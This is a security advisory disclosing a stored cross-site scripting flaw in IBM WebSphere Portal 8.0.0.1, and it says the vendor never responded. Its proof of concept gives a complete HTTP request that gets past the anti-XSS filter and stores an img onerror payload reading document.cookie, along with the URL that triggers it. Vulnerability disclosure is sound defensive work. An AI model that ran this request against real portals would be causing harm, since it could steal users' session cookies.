SSD Advisory – IBM WebSphere Portal Cross-Site Scripting (XSS)

Vulnerabilities Summary
The following advisory describes a Cross-Site Scripting (XSS) vulnerability found in WebSphere Portal version 8.0.0.1.
IBM WebSphere Portal products provide enterprise web portals that help companies deliver a highly-personalized, social experience for their customers. WebSphere Portal products give users a single point of access to the applications, services, information and social connections they need. These products help increase visitor response and reduce web operations cost while offering a range of capabilities to meet your business needs.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
We notified IBM of the vulnerability back in September 2016, repeated attempts to re-establish contact and get some answer on the status of the patches for this vulnerability went unanswered. At this time there is no solution or workaround for this vulnerability.

Vulnerabilities Details
IBM WebSphere Portal version 8.0.0.1 suffers from an input validation issue resulting in the bypass of the built-in anti Cross-Site Scripting (XSS) mechanism, which is implemented to filter potentially malicious HTML tags while updating user’s profile detail. The identified vulnerability allows malicious users to perform stored XSS attacks in order to steal session cookie’s token or perform CSRF attacks.
Proof of Concept
The following HTTP request can be used to bypass the anti-XSS filter and store arbitrary JavaScript code as part of the user profile information:

POST /profiles/ajax/editMyProfile.do?lang=en_us HTTP/1.1
Host: 192.168.1.200
User-Agent: Mozilla/5.0 (xxxx)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.200/profiles/html/editMyProfileView.do?tab=aboutMe&lang=en_us
Content-Length: 258
Cookie: *cookies here*
Connection: keep-alive
Cache-Control: no-cache
dangerousurlnonce=cdcdccd-3333-2222-1111-000000000000&subEditForm=aboutMe&attribute(description)=%3Cp%20dir%3D%22ltr%22%3E%0A%09%3Cstrong%3EAAAAA%3C%2Fstrong%3E%3C%2Fp%3E%0A&attribute(experience)=<img%20src=x%20xxxx%20onerror="alert(document.cookie)"%2f%2f%

Once the attacker has stored the payload as part of its profile, the embedded JavaScript code can be execute browsing the following URL:

https://192.168.1.200/profiles/html/profileView.do?userid=*attacker_user_id*&lang=en_us

It should be noted that the aforementioned HTTP request results in the storage of the following HTML tag, which allows the execution of the alert() JavaScript method:

<img src=x xxxx onerror="alert(document.cookie)"//%